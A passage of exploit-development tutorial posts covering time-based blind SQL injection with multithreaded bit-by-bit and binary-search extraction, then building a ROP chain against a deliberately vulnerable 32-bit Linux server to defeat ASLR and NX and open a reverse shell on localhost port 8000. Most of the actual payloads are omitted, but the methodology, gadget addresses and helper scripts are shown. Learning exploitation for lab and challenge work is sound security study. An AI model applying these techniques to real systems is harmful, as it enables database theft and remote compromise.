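    return delayed - baseline >= delay * 0.8
```

Measuring a baseline first matters on slow or noisy networks, where a page that always takes a few seconds could otherwise be mistaken for a successful injection.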
Exploitation
Now we can use the information we have already to inject a conditional statement that only delays when we've found the correct character of a string.
Our injection will look something like this:
Or:
Both will work fine.
This time because we are using a time-based approach we want to try to speed things up by writing a script which has the ability to make multiple requests at once.
We can do this using multithreading, and in Python using the threading module.
I will use Queue for submitting the jobs to the threads and a list for getting the responses.
Here is the script:
So firstly, lines 5-8, I set the maximum length of the string that we are looking for; by default it's 256 but it can be changed by the first argument and should always be a multiple of 2.
Then, lines 10-13, I set the number of threads; by default it's 3 because this is the limit that the SecurityTube SQLi challenges allow, but it can be changed by the second argument.
I then create 2 classes that inherit from threading.Thread, which allows them to be multithreaded.
The first of these classes, as the name suggests, gets the length of the string resulting from the query that we want to run.
The second, as the name also suggests, gets the characters.
First I launch a bunch of threads to find out the length of the string, and wait until they are finished.
Then I launch a bunch of threads to find out the value of each character.
I'm using 2 different methods of concurrency here, mainly to demonstrate both methods.
Bit-For-Bit Method
The first, to find the length, is a bit-for-bit check, basically I'm checking whether each bit in the result is a 1 or a 0.
To understand this you need to picture the numbers in their binary representation, so let's take the value 73.
So our string is 73 characters long, which means if I run the query length([query])
, it returns 73.
The binary representation of 73 is 01001001 using 8 bits.
Each bit's value is 2^n, where n is the position of the bit minus 1, starting at the rightmost position.
So the first bit is a 1, its value is 2^0 or 1, the second bit is a 0 its value is 2^1 or 2, but because it is 0 we can ignore it.
If we continue this the bits with a 1 have the values, 1, 8 and 64, if we add these together we get 1+8+64=73.
So you can see how we can get the length of the string of less than 256 characters in no more than 8 requests.
The next question is how do we test if a certain bit is 1 or 0, the answer is bitwise operators.
Here I am using the AND or & operator, which returns a result in which only the bits that were 1 in both operands are set.
Let's look at our example again, if we do 73 & 1 we get 1, if we do 73 & 2 we get 0 because the bit that represents 2 is not a 1 in 73.
Using this method our conditional query becomes length([query]) & [bit we are testing for] = [bit we are testing for].
This way we can, in theory, test for each bit position in parallel.
Obviously instead of returning 1 if the condition is true we will sleep for 3 seconds and check the response time.
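The bit-for-bit idea can be sketched in a few lines of Python. Note that this sketch uses concurrent.futures rather than the threading module and Queue described above, and that bit_is_set is a hypothetical callback: against a real target it would inject the condition for one bit and return True when the response was delayed. Here a fake oracle answers locally for the value 73.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable


def recover_number(bit_is_set: Callable[[int], bool],
                   bits: int = 8, workers: int = 3) -> int:
    """Rebuild an integer from one true/false answer per bit."""
    masks = [1 << n for n in range(bits)]  # 1, 2, 4, ..., 128
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # Each mask is an independent question, so they can run in parallel.
        answers = list(pool.map(bit_is_set, masks))
    return sum(mask for mask, hit in zip(masks, answers) if hit)


def fake_oracle(mask: int, length: int = 73) -> bool:
    """Stand-in for: length([query]) & mask = mask."""
    return (length & mask) == mask


if __name__ == "__main__":
    print(recover_number(fake_oracle))
```

Because no answer depends on any other, the number of requests is fixed at 8 for a value below 256, and the wall-clock time is limited mainly by how many threads the target tolerates.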
Binary Search Method
The second check, to find out the actual characters, I am using a binary search.
Basically a binary search works by finding the middle of the search range and asking if the value is greater than that, effectively narrowing the search by half with every request, until the correct value has been found.
Let's take the same example as the example we looked at for the bit-for-bit method, so the value is 73.
The maximum value for 1 byte of data is always 255, so there are 256 possible values.
First we'll ask if 73 > 127, to which the answer is no, so the max becomes 127, and the middle becomes min + ((max - min) / 2) or 1 + ((127 - 1) / 2) or 1 + (126 / 2) or 1 + 63 or 64.
Then we go again and ask if 73 > 64, the answer is yes, so the min becomes 65 and the mid becomes min + ((max - min) / 2) or 65 + ((127 - 65) / 2) or 65 + (62 / 2) or 65 + 31 or 96.
We can represent this type of comparison in our injection condition like this:
ascii(substr([query],[position we are testing],1))>[current mid value]
This continues until we find the correct value, which takes 8 requests with an 8-bit value (up to 255).
Using this and substituting current_user%28%29 with any query that we want the output of, we can enumerate anything in the database that the current user has permissions to view.
Because we know the number of characters we can do multiple characters in parallel.
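Here is a minimal sketch of the binary search for a single byte. is_greater is a hypothetical callback that would inject ascii(substr([query],[position],1))>[mid] and report whether the delay occurred. This version starts its range at 0 rather than 1, so the intermediate mid values differ slightly from the worked example above, but the halving is the same.

```python
from typing import Callable, Tuple


def find_byte(is_greater: Callable[[int], bool],
              lo: int = 0, hi: int = 255) -> Tuple[int, int]:
    """Return (value, number_of_requests) for a byte in the range lo..hi."""
    requests = 0
    while lo < hi:
        mid = lo + (hi - lo) // 2
        requests += 1
        if is_greater(mid):
            lo = mid + 1  # the value is somewhere above mid
        else:
            hi = mid      # the value is mid or below
    return lo, requests


if __name__ == "__main__":
    print(find_byte(lambda mid: 73 > mid))
```

Unlike the bit-for-bit method, each request here depends on the previous answer, so the parallelism has to come from searching several character positions at the same time.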
Conclusion
You should now have a very good idea of how to look for and exploit SQL injections in a blackbox way.
Every situation will be different which is why, even though a lot of the automated SQL injection tools out there (like sqlmap) are good in a lot of situations, you still need to understand how to do it all manually for when the tools fail.
Being able to script SQL injection tools is a necessity when dealing with blind SQL injections, trying to enumerate even small amounts of data when you only have the ability to extract 1 bit at a time would be a horrible task!
Further Reading
The best book I've read on SQL injection is Justin Clarke's SQL Injection Attacks and Defense, and he goes into a lot more detail and covers more situations than I can in this single post.
Beating ASLR and NX using ROP
So far we've only beaten either ASLR or NX separately; now I will demonstrate how to beat both of these protections at the same time.
To do this I will use ROP (Return-oriented programming). We've seen ROP briefly in the last post but now we will use it a lot more extensively.
ROP itself is a very simple idea: in situations where it's impossible to run your own code, you use the code already in the application to do what you want it to do.
As we saw in the post about beating ASLR, with full ASLR enabled the only section that is static is the text segment, which contains the application's own code.
The "Return to Libc" method won't work because dynamically loaded libraries aren't at the same segment of memory as the applications code so we can no longer predict what memory addresses these functions (or pointers to the functions) will be at.
Normal shellcode will not run because NX is enabled.
So we have to find a way to run our own code by using only the code which is always loaded at the same address in memory.
It's worth noting that every ROP exploit will be remarkably different. This is because we can only use the application's own code and every application's code is different, so the important thing to learn in this post is the methodology that I will use to build the exploit.
I will assume that you have an in-depth knowledge of the IA32 architecture and how the calling convention used by Linux (cdecl) works.
The App
The application we will be attacking is the same application as in the beating ASLR post.
The only thing I've changed here is the size of the input accepted by the server (from 1000 to 4096). This is because the payload I need to send is larger than 1000 bytes.
Setting Up The Environment
Because the application that we are attacking is so small, we need to compile it with the -static flag; this will compile any libraries into the binary, making for a larger text segment:
It's important to use the -static flag, firstly because you won't have enough ROP gadgets to write the exploit otherwise, and secondly because nearly all real world applications are much bigger than this small one, so compiling it with the libraries statically linked will make it more realistic.
If you don't get 2 from /proc/sys/kernel/randomize_va_space then run (as root):
Getting Gadgets
To build a ROP exploit you need to find ROP gadgets.
A ROP gadget is 1 or more assembly instructions followed by a ret (or return) instruction.
Finding these gadgets manually would be painful and slow, so we will use an already available tool, ROPgadget by Jonathan Salwan of Shell Storm.
You can download the tool using git:
This script looks for all ROP gadgets in the application code and outputs them. There will be a lot of output, so redirect the output to a file to search through later:
The file (gadgets) will contain lines in the form of:
[memory address] : [series of instructions at that address]
The first thing I looked for is an int 0x80 followed by a ret:
There are none, this means we will have to do the attack in 1 syscall.
You can download the full list of ROP gadgets that I got here.
Testing New Shellcode
All of the shellcode I've written until now used multiple syscalls, we aren't able to do that now so we need 1 syscall that is useful for us.
To do this I will use the bash one-liner here:
As before, although I'm doing everything over the loopback interface for ease and convenience, this could be done to any IP address.
I will use the execve syscall for this; in C this would look like:
Using this, and already knowing (from previous posts) that the syscall number for execve is 11, we can create the same code in assembly and shellcode. First we need the strings in hex and backwards (because of the little-endian architecture).
For this I will use a little Python script I wrote:
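The sketch below shows one way such a helper could work. The function name push_values and the choice to left-pad with / (which only makes sense for paths, where extra slashes are harmless) are assumptions for illustration. It splits the string into 4-byte chunks and prints each chunk as a little-endian double word, last chunk first, which is the order the values would be pushed onto the stack.

```python
import struct
import sys
from typing import List


def push_values(text: str, pad: str = "/") -> List[str]:
    """Return the double words to push, in push order, for an ASCII string."""
    data = text.encode("ascii")
    # Left-pad so the length is a multiple of 4 bytes.
    data = pad.encode("ascii") * (-len(data) % 4) + data
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downwards, so the end of the string is pushed first.
    return ["0x%08x" % struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


if __name__ == "__main__":
    for argument in sys.argv[1:]:
        print(argument)
        for value in push_values(argument):
            print("    push " + value)
```

For strings that are not paths, a different padding strategy would be needed, since a stray / at the front would change their meaning.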
Now we can just run this script with each of our strings as an argument:
Now we can build the shellcode in assembly:
You can test this shellcode the way we have tested shellcode in the past, I won't do that because this post will be long enough anyway, just remember to use netcat to start listening because this will do a reverse shell connecting back to 127.0.0.1 on port 8000.
Searching Through The Gadgets
Now that we know how the registers need to be set up when we execute the syscall, we can go about searching through the available gadgets to see which registers we have a lot of control over and which registers are more difficult to manipulate.
We can search the gadgets file with regex, like this:
The search above searches for any gadgets that use the ecx register as the source operand.
We also use grep 'ret$' at the end because we are only interested in gadgets that end with a ret instruction (otherwise it also shows gadgets that end in int 0x80).
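The same kind of filtering can be done in Python if you prefer to keep the results as data. This is a minimal sketch that assumes the gadgets file uses the [memory address] : [instructions] layout described earlier. The sample lines and their addresses are made up purely for illustration and are not taken from the real binary.

```python
import re
from typing import Iterable, Iterator, List, Tuple

# Made-up sample in the same layout as the gadgets file.
SAMPLE = """\
0x08040001: mov eax, ecx ; ret
0x08040002: mov ecx, eax ; pop ebx ; ret
0x08040003: add edx, ecx ; int 0x80
0x08040004: xor eax, eax ; ret
"""


def parse(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (address, instructions) for every well-formed gadget line."""
    for line in lines:
        match = re.match(r"(0x[0-9a-fA-F]+)\s*:\s*(.+)", line.strip())
        if match:
            yield int(match.group(1), 16), match.group(2)


def uses_as_source(gadgets: Iterable[Tuple[int, str]], reg: str) -> List[Tuple[int, str]]:
    """Keep gadgets where reg is a source operand and the gadget ends in ret."""
    source = re.compile(r",\s*%s\b" % re.escape(reg))
    return [(addr, ins) for addr, ins in gadgets
            if source.search(ins) and ins.endswith("ret")]


if __name__ == "__main__":
    for addr, ins in uses_as_source(parse(SAMPLE.splitlines()), "ecx"):
        print("0x%08x : %s" % (addr, ins))
```

To run it against the real list, open the gadgets file and pass the file object to parse instead of the sample lines.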
After searching through the gadgets for a while it becomes obvious that the ecx register is one of the more difficult to manipulate, so we will use the eax, ebx and edx registers to manipulate the data and we want to sort out the final value of ecx near the start of the exploit.
While searching through the gadgets, it would be helpful to paste what look to be the most useful gadgets into a separate file so that you don't have to keep searching through the full list of gadgets.
Building The ROP Exploit
We are going to run into a few major problems while building this exploit.
Firstly, as I already mentioned ecx manipulation is highly restrictive.
Secondly, we are unable to send nulls (0x0) so we will need to put in placeholders and change their value in memory during runtime.
Lastly, we have no idea of any memory addresses within the payload that we will send, so we will have to calculate them during runtime too, so that we can reference certain parts of our payload.
Because our main 2 problems are to do with values within our payload and because we are unable to exploit this without being able to reference values within our payload we need to approach this problem first.
We do this by getting any address within our payload and calculating the rest of the addresses relative to that address.
The easiest way to do this is by getting the value of esp which, throughout our exploit, will point to a certain part of the payload.
There are various ways to do this (eg. by finding a mov [reg], esp or add [reg], esp) but we will use the following push, pop sequence to get the value of esp into ebp:
And then move the value of ebp into eax:
Because eax is the most used register in our available ROP gadgets, it's handy to be able to move values into eax for further processing.
Analysing The Exploit
It's important to analyse this exploit throughout its development because of its complexity.
You will need to apply the methodology that I use here thoroughly while developing the exploit.
First we write a Python exploit containing the 2 ROP gadgets we have found so far:
All this is doing is sending 532 A's to overflow the buffer until we start overwriting the return address.
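The payload construction on its own can be sketched as follows. The 532 byte offset and the 2 gadget addresses (0x0807715a and 0x080525d0) are the values quoted in this post, while build_payload and the null check are my own additions for illustration. Actually sending the bytes to the server is left out.

```python
import struct
from typing import Iterable

OFFSET = 532                        # filler needed to reach the return address
GADGETS = [0x0807715a, 0x080525d0]  # first and second gadget, in execution order


def build_payload(gadgets: Iterable[int], offset: int = OFFSET,
                  filler: bytes = b"A") -> bytes:
    """Filler up to the return address, then the chain as little-endian dwords."""
    chain = b"".join(struct.pack("<I", address) for address in gadgets)
    if b"\x00" in chain:
        raise ValueError("the chain contains a null byte and cannot be sent")
    return filler * offset + chain


if __name__ == "__main__":
    payload = build_payload(GADGETS)
    print(len(payload), payload[OFFSET:].hex())
```

Keeping the chain as a list of integers makes it easy to append further gadgets and junk values as the exploit grows.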
Then we open the vulnerable application using gdb and run the exploit against it:
Firstly, on line 4, I disassemble the checkpass function. This is the vulnerable function, so our exploit gets triggered when this function returns (runs its ret instruction).
We need to set a breakpoint at the address of this ret instruction (0x080486e4 on line 34 and set on line 36) so that we can trace through and observe the values of the registers as our exploit runs.
On lines 38 to 43, I define a function that runs every time execution stops; this just gives us the top 10 values on the stack (as referenced by esp) and the current instruction to be run (as referenced by eip).
Next, on lines 44 and 45, I instruct gdb to display the values of the ebp and eax registers, this will also run every time execution stops, these are the 2 registers we are manipulating with our first 2 gadgets.
Lastly I run the application and when I launch the exploit breakpoint 1 is reached (on line 53).
As you can see, from line 51, eip now points to the ret instruction at the end of the checkpass function, which is where our exploit begins.
The current values of eax and ebp are 0xffffffcd and 0x41414141 respectively.
Looking at the output of x/10xw $esp, which just prints the top 10 values on the stack, the first value is 0x0807715a (just the address of our first gadget) and the second is 0x080525d0 (which is the address of our second gadget).
After the second gadget is run eax should contain 0xbfffe740 (0xbfffe73c + 0x4).
Now we just trace through the next few instructions using the stepi gdb command:
So this worked as expected and we now have the address of our second ROP gadget inside eax.
All other addresses can be worked out relative to the address that we currently have.
Calculating An Address
The data that we need to reference we will put at the end of our payload.
Once we have the exploit almost complete we will know the length of our payload, but until then we will write the exploit with an arbitrary value and change it later.
For this we will use 1000 as the length from the second ROP gadget (the address we just retrieved from esp) to the start of our data.
Next we have to figure out how we will arrange the data at the end of the payload, this will allow us to work out the distances between the different sections of data so that the only value that will need to be changed is the first that we calculate. This will become more clear as we develop more of the exploit.
We need 4 different parts in the data section, the 3 strings and the pointers for the second argument to execve.
Here is how I've laid out the data:
I've used 0xffffffff to represent where we want null bytes, these will have to be overwritten during runtime. We will also need to overwrite the pointers with the correct values at runtime, for now I've just put the placeholders 0xbbbbbbbb, 0xcccccccc and 0xdddddddd so that we can easily tell where we are while debugging the exploit.
It's also worth noting that because we are writing up the stack from lower down, the strings will be in normal order, there is no need to think about little endianness for them.
There is technically no reason to use ////bin/bash instead of /bin/bash here, like there was when writing the shellcode, but it rounds this up to a multiple of 4 bytes so addresses will be slightly easier to calculate (this is one place this exploit could be optimized to reduce the size).
Now we need to calculate the address of the last value in our data (0xffffffff at the bottom).
There are 22 double words (a double word is 4 bytes) in the data, so 22 * 4 = 88; therefore we have 88 bytes from the top of our data to the end. As we are using 1000 bytes as a placeholder for the length from the address we currently have to the top of the data, there are 1088 bytes we need to add to the address we got from esp in our first gadget.
Because we can't use nulls in our payload we have to calculate 1088 at runtime, we can do this using only eax and ebx, but first we have to move the value we currently have in eax, we'll move it to edx using this gadget:
Along with moving the value in eax to edx, it pops 3 values off of the stack. We need to deal with this because if we put another gadget directly below this one it will be popped off into a register and will not be used.
We will use 0xeeeeeeee to represent junk values that will be popped off the stack but not used.
To calculate 1088 without using null bytes we will use 0xaaaaaaaa and subtract the relevant number; to find out that number we do 0xaaaaaaaa - 1088 = 0xaaaaa66a.
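This arithmetic is worth double-checking in code, because a single wrong digit will break every address calculated afterwards. The sketch below recomputes the distance and finds the second operand for an arbitrary base value. null_free_pair is a hypothetical helper name, and it simply refuses to return a pair if either value would contain a null byte once packed.

```python
import struct
from typing import Tuple

PLACEHOLDER_DISTANCE = 1000  # temporary distance to the start of the data
DATA_DWORDS = 22             # size of the data section in double words
DISTANCE = PLACEHOLDER_DISTANCE + DATA_DWORDS * 4  # 1088


def null_free_pair(value: int, base: int = 0xaaaaaaaa) -> Tuple[int, int]:
    """Return (base, other) such that base - other == value, with no null bytes."""
    other = (base - value) & 0xffffffff
    for candidate in (base, other):
        if b"\x00" in struct.pack("<I", candidate):
            raise ValueError("0x%08x contains a null byte" % candidate)
    return base, other


if __name__ == "__main__":
    base, other = null_free_pair(DISTANCE)
    print("0x%08x - 0x%08x = %d" % (base, other, base - other))
```

When the real payload length is known, only PLACEHOLDER_DISTANCE needs to change and the second operand can be regenerated.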
We can subtract 2 values in eax and ebx using the following gadget:
And we can use the following 2 gadgets to get the required values into eax and ebx respectively:
Here I think is a good time to mention the importance of keeping notes while you are creating this exploit, here are my notes so far:
It's worth noting that to get to a lower value in our payload we need to increase the address and if we want to get to a higher value we need to decrease the address. This is a very important point!
Knowing this, to get to the end of the data from the higher up address we received earlier from esp, we need to add the address to the distance we just calculated.
We can do the addition to calculate the address that we want using this gadget:
This will add eax and ebx and store the result in eax.
First we need to move the value from eax into ebx, for that we can use this gadget:
And then move the address stored in edx (the first address we retrieved from esp) into eax:
If we put all of these together (while remembering to include junk values for the irrelevant pop instructions contained within the gadgets) we get:
eax will now contain the address of the end of our data.
If you look again at the data you will realise that this address should contain nulls (it's the last lot of 0xffffffff right at the end of our payload).
As we have this address we should go ahead and write nulls here so we don't have to worry about it later.
We can write whatever is stored in the eax register to an address stored in the edx register using this gadget:
Before we can do that we need to move the address from eax into edx:
And we need to put 0 into eax:
Using all of this knowledge our notes should look like this (again bear in mind the junk values we need to insert):
Now would be a good time to test the exploit again, what we will do here is pad the rest of the exploit so that our data starts 1000 bytes after our second ROP gadget, this way we can see if our exploit is calculating the correct values.
Here is the updated exploit:
This time I will set the breakpoint at 0x08083f21 and ensure everything is correct:
As you can see, we've successfully written nulls where the f's used to be at the end of our data.
Afterwards, I've printed the 3 values further up our payload (which are just where our pointers will be) to show that it is in fact the correct address we are writing to.
Now that we've fixed the nulls at the bottom, the next problem we should approach is setting the value for the ecx register, as this will be the second most difficult challenge.
Setting ECX
The gadget that I felt was the best chance of getting a value into ecx is:
ecx needs to contain the address of the beginning of our pointers in the data, where we have put 0xbbbbbbbb.
There is a big problem here, this code will jump to the fixed address 0x804dca1 if the value pointed to by eax does not contain 0.
This means we first have to write 0 there before we can set ecx.
We will use the exact same method that we just used to write 0 to the end of the data, except this time we will calculate the address relative to the current value of edx (the end of the data section).
We use the following series of ROP gadgets to do this:
We've used all of these gadgets already so unless we miscalculate the distance somewhere this should all work fine and we can run the other gadget to set ecx.
Once we run the gadget to move eax into ecx, the value of ecx is set and will no longer need to be touched; this also means we cannot run any gadgets that alter ecx in any way.
Calculating The Address Of A String And Setting The Pointer
As we already have the address of the first pointer in edx we might as well set this to the correct value.
This should contain the address of the string ////bin/bash, which is the first string in the data section.
If you work it out you will see that the start of the relevant string is 18 double words, or 72 bytes, from the current value of edx (and ecx).
We can now use the exact same gadgets that we've already used to calculate the address of the string and write it to the location pointed to by edx:
Now would be a good time to test the exploit again.
At the end of this we expect ecx and edx to point to the beginning of our pointers, and eax should point to our ////bin/bash string, the address of which should also be written to the location that ecx and edx point to.
We have also written nulls at the end of our data (but we haven't changed this code and we've already tested it so that should work fine unless we've made a calculation error).
Here are the updated notes:
This is our updated exploit:
When we test this we want to break at 0x08083f21, but there are 3 times we are using this gadget so we should continue through the first 2 and then check the values:
Clearly we can see that we have written the correct address to the pointer and it now points to the correct string.
The reason we have the rest of the stuff there is because the examine command (x) in gdb, when printing a string (x/s), stops when the first null is reached and we haven't written the null terminator at the end of the string yet.
Calculating And Writing The Remaining Nulls
We should now go about writing the nulls to the relevant parts in our data, we still have 3 nulls to write, 1 to terminate each of the string arguments.
I will not walk through each of these because I will use the exact same method, but it is important to test the exploit at regular intervals to ensure you aren't miscalculating any values, because a single miscalculation will spoil the rest of the exploit.
If it isn't obvious by now, what I'm doing is using edx as a pointer to where I want to write, using eax and ebx to work out the distance from the current value of edx to the next value, then calculating the address of the next value and finally moving that value into edx and writing zero to it.
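The bookkeeping described above can be modelled in a few lines of Python. This is only a sketch: the data layout, the `id` command string and the distances are made up for illustration and are not the real payload, and `edx` is just a Python integer standing in for the register.

```python
import struct

# Hypothetical data section: each string is followed by a 0xffffffff
# placeholder that has to become a null terminator at runtime.
data = bytearray(
    b"////bin/bash" + b"\xff" * 4 +
    b"-c" + b"\xff" * 4 +
    b"id" + b"\xff" * 4
)

def write_zero_dword(mem, addr):
    """Model of the 'write a zeroed register to [edx]' step: store a 32-bit 0."""
    struct.pack_into("<I", mem, addr, 0)

edx = 0  # model: edx starts at the beginning of the data
for distance in (12, 6, 6):  # distance from the current edx to the next placeholder
    edx += distance          # the eax/ebx arithmetic collapses to an addition here
    write_zero_dword(data, edx)

strings = [s for s in bytes(data).split(b"\x00") if s]
print(strings)  # [b'////bin/bash', b'-c', b'id']
```

The point of the model is that every write is relative to the previous one, so one wrong distance shifts every later write as well.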
Here are my notes updated to the point where all of the nulls have been set:
At this point all of our strings should be correctly null terminated.
Let's test this. I won't post the exploit script, to try and keep the size of this post down a little, but all I've done is put the relevant values into the script in the order I've put them in my notes.
To make it easier to break at the end I've put a gadget that I haven't used elsewhere (at 0x808456c) so that I can just break at the end and inspect memory:
So our 3 strings are now correctly null terminated.
I calculated the addresses from the value stored at the address that ecx points to (the address of the first pointer that we wrote earlier).
On line 18 I instruct gdb to display the value of ecx, I then use the examine command to display the string at the address contained there.
I then add 18 (the number of bytes until the -c string) and display that string and add another 6 (the number of bytes from that point to the next string) to display the last string.
Writing The Remaining Pointers
As with the code we just wrote I will not go through every step as the method I will use is the same.
I will be working out the address of the first pointer that I need to change (firstly being the pointer to the -c argument string) using eax and ebx and using edx as the point of reference.
I will then be putting that address into edx, working out the address of the string that that pointer should be pointing to using the same method (which stores the address in eax) and then writing the value that eax contains into the address pointed to by edx.
There are 2 pointers that we need to do this for, the pointer to -c and the pointer to the long string (the actual reverse shell).
If you've fully understood the post so far, this should be a reasonably trivial task.
Here is the section of my notes that do this:
Now all of the pointers should point to the correct strings.
It's time to test it again, I will be using the same breakpoint trick I used last time:
Great, so that worked perfectly.
Setting Up The Rest Of The Registers And Inserting The Last Of The Gadgets
We now have everything set up except for the values of the eax, ebx and edx registers.
edx just needs to point to 1 of the nulls that we wrote, ebx should contain the address of the ////bin/bash string and eax should contain the value 11.
We will deal with edx first because we have to use ebx and eax afterwards.
We will then calculate the address that needs to go into ebx.
Lastly we will get 11 into eax and finally run int 0x80.
Here are my full finished notes.
Finishing The Exploit And Testing It
Now that we've got the full size of the exploit we can calculate the size of our code and recalculate the distance from the address that we first receive to our data.
I did this using a python script with all of the gadgets in, you can find that script here.
This shows us that the distance is 908 bytes and not 1000 bytes.
To recalculate this we do the sum 0xaaaaaaaa - (908 + 88) = 0xaaaaa6c6, so this is the new value that we need to pop into ebx at the start of our application to calculate the first address.
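The sum is easy to get wrong by hand, so here is a small Python check of it. The names `BASE` and `ebx_for` are mine and only used for illustration; the numbers are the ones from the text.

```python
BASE = 0xAAAAAAAA  # constant that the distance is subtracted from

def ebx_for(distance):
    """Value to pop into ebx so that BASE - ebx equals `distance` (32-bit)."""
    return (BASE - distance) & 0xFFFFFFFF

code_size = 908  # size of the gadget chain reported by the script
extra = 88       # the additional 88 bytes from the sum above

new_ebx = ebx_for(code_size + extra)
print(hex(new_ebx))  # 0xaaaaa6c6
```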
Now we have finished writing the exploit:
Firstly we need to start netcat listening on port 8000 to catch the reverse shell:
Now we should launch the vulnerable application (notice I'm using a different user to make it more obvious when the exploit works):
Lastly we need to launch the exploit and watch the terminal that we are running netcat in:
Now look at the terminal with netcat running and test by running some commands:
PWNED!!! :-D
Conclusion
It's important to realise that this exploit will not work against any other application, and might not even work with the same application run in a different environment (ie. on a different kernel version) or compiled with a different compiler or compiler version.
This is why it's so important to get as much information about the target environment as possible before developing an exploit for it.
That said, if you have understood this post you should now be able to develop a ROP exploit for any application on a 32 bit Linux system and beat both ASLR and NX, you just have to use the methodology we used here.
A bit of creativity needs to be used to create 1 of these exploits.
Happy Hacking :-)
Further Reading
I've not actually read anything relevant to ROP exploitation, just simple explanations of how it works.
Improving The ROP Exploit
So after the last post I kept thinking of ways that I could improve the exploit so I decided to do it.
If you haven't already read the last post on developing a ROP exploit, you should read that before this because I will not cover anything that I covered there and it is just a continuation of that. You can read it here.
As with any exploit development the main point of interest for improvement is reducing the size of the payload so this is where I will focus.
You can think about obfuscation and such in certain exploitations but when ROP is required obfuscation isn't really an option.
Why/How ROP Works
In the last post I didn't really go into much detail about why or how ROP actually works because the post was already pretty long but I thought I'd go into it a bit here.
In my post titled Basic Binary Auditing, in the section called Stack Frames I explain how function calls and returns work.
The important part of that in terms of ROP is how the function returns. A stack-based buffer overflow exploit is initiated when the vulnerable function returns.
This is because the return address that is stored on the stack is popped off of the stack into eip (the instruction pointer).
This happens because when a function is returning it has no way of knowing where in the application code to continue executing.
Because of this the address that execution should return to after the function is finished is pushed onto the stack when the function is called so that it can be retrieved when it's finished.
If you find a stack-based buffer overflow and you are able to send enough data to overwrite this address you can change the flow of execution and point eip wherever you want.
With ROP, understanding this concept is paramount to success. What you are doing is creating your own stack (the same as with return to libc).
The only difference between ROP and return to libc is that instead of "calling" actual library functions you are "calling" snippets of code that resemble the end of a function (a few instructions and then a return), which are called gadgets.
By inserting a bunch of gadgets 1 after another on the stack (chaining) you are controlling the execution flow of the application and with enough gadgets you can build a suitably large application to do whatever you want.
If you understand this it becomes obvious that esp (the stack pointer) has now become your new eip.
By changing the value of esp you can actually create a new stack elsewhere. This becomes useful for various reasons, e.g. if you are constrained for space on the stack (as in kernel mode) you can allocate space on the heap, insert your stack there and change esp to point to your new stack.
I will use this method in this exploit for making ROP function calls and explain how you can use this to make ROP conditional statements.
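To make the "esp is the new eip" idea concrete, here is a toy model in Python. It is a sketch under heavy assumptions: the gadget addresses are invented, gadgets are plain Python functions, and esp indexes whole stack slots rather than bytes.

```python
# Registers of the toy machine.
regs = {"eax": 0, "ebx": 0, "esp": 0}

def pop_eax(stack):
    """Models 'pop eax; ret'."""
    regs["eax"] = stack[regs["esp"]]
    regs["esp"] += 1

def pop_ebx(stack):
    """Models 'pop ebx; ret'."""
    regs["ebx"] = stack[regs["esp"]]
    regs["esp"] += 1

def add_eax_ebx(stack):
    """Models 'add eax, ebx; ret'."""
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF

# Hypothetical gadget addresses mapped to their behaviour.
GADGETS = {0x1000: pop_eax, 0x2000: pop_ebx, 0x3000: add_eax_ebx}

def run(stack):
    """Each 'ret' pops the next slot into eip, so esp decides what runs next."""
    regs["esp"] = 0
    while regs["esp"] < len(stack):
        target = stack[regs["esp"]]
        regs["esp"] += 1
        GADGETS[target](stack)
    return regs

chain = [0x1000, 40, 0x2000, 2, 0x3000]
print(run(chain)["eax"])  # 42
```

Notice that the chain is nothing but data: addresses and operands interleaved on the stack, which is exactly what the exploit payload is.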
Moving The Data Section
Back to our exploit.
If you remember we put the data section of our payload at the end but we have 532 A's that we are sending in order to overflow the buffer.
The best way to reduce the size of our exploit is to make as much use of this section at the start as possible.
So we will now move the data section to the start.
I mentioned in the last post that using ////bin/bash instead of /bin/bash wasn't technically needed and was a bit of a waste of space but as we are moving this section to the padding section, which always has to be a fixed 532 bytes, we can leave it as is for now.
If we actually use the whole 532 bytes of this section I will make some changes here to reduce its size but as it is it makes calculations slightly easier.
A ROP Function
IMO, the most exciting part of this new exploit will be the implementation of a "function call".
In the last exploit we were using the same series of gadgets throughout the exploit to calculate addresses.
In a normal application we'd use a function for this, so I thought why shouldn't we here. Looking through the available gadgets I created this to do our address calculations:
Here the "return address" (the value on the stack that we need to put back into esp at the end) starts off in the eax register.
The function takes 2 "arguments": ecx, which should contain the starting address of the function, and ebx, which should contain the value 0xaaaaaaaa - [distance from the start of the function to the value we want the address of].
As the values we need to calculate are in the data section we want to stick this function below the data section (it could go before but we'd have to change the last sub instruction to an add instruction).
The return value of this function is stored in edi when this function is finished.
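As a rough model of what the function computes (not of the gadgets themselves), the calculation can be written in Python like this. The function name and the example addresses are hypothetical; the only things taken from the text are the 0xaaaaaaaa constant, the two "arguments" and the final subtraction.

```python
BASE = 0xAAAAAAAA

def rop_calc_address(ecx, ebx):
    """Model of the address-calculation 'function'.

    ecx: address of the start of the function
    ebx: BASE - distance from the function back to the wanted value
    Returns the value that would end up in edi.
    """
    distance = (BASE - ebx) & 0xFFFFFFFF
    return (ecx - distance) & 0xFFFFFFFF  # the final sub instruction

# Hypothetical example: the function starts at 0xbffff600 and the value
# we want the address of sits 72 bytes before it.
ebx = BASE - 72
edi = rop_calc_address(0xBFFFF600, ebx)
print(hex(ebx), hex(edi))  # 0xaaaaaa62 0xbffff5b8
```

If the function sat before the data instead, the last line of the model would add the distance rather than subtract it, matching the sub/add remark above.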
Based on the gadgets we have available there are 2 different ways that I have found to set up the "call" for this function. The first is this:
And the second:
Both of these achieve the same outcome and certainly for our purpose there isn't any difference between the 2.
After 1 of these series of instructions we have the address of the function in eax, so we can call the function with the following gadget:
This will put the return address into eax and begin execution at the start of our function.
Once our function returns the return value will be in edi, in our old exploit this value was always put into eax or edx.
We can get this value into eax using this gadget:
And if we want the return value in edx we can use this gadget:
With this gadget we can put a value straight into ebx setting up ebx for the next function call.
All addresses will now be calculated relative to ecx which should contain the address of the start of the function, therefore this should now be the first problem we approach and the final address of ecx should be set after we've finished with the function.
Testing The Exploit
We want to try to minimize the number of junk values as much as possible too so this should be kept in mind while putting the gadgets together.
At this point you should have notes similar to the following:
Here I'm using the function to calculate the address of the first set of 0xffffffff (to terminate the long argument string) and writing nulls there.
The actual exploit is a very simple python script, as you should know from the first post, so I will only post the full script at the end when we have developed the final exploit.
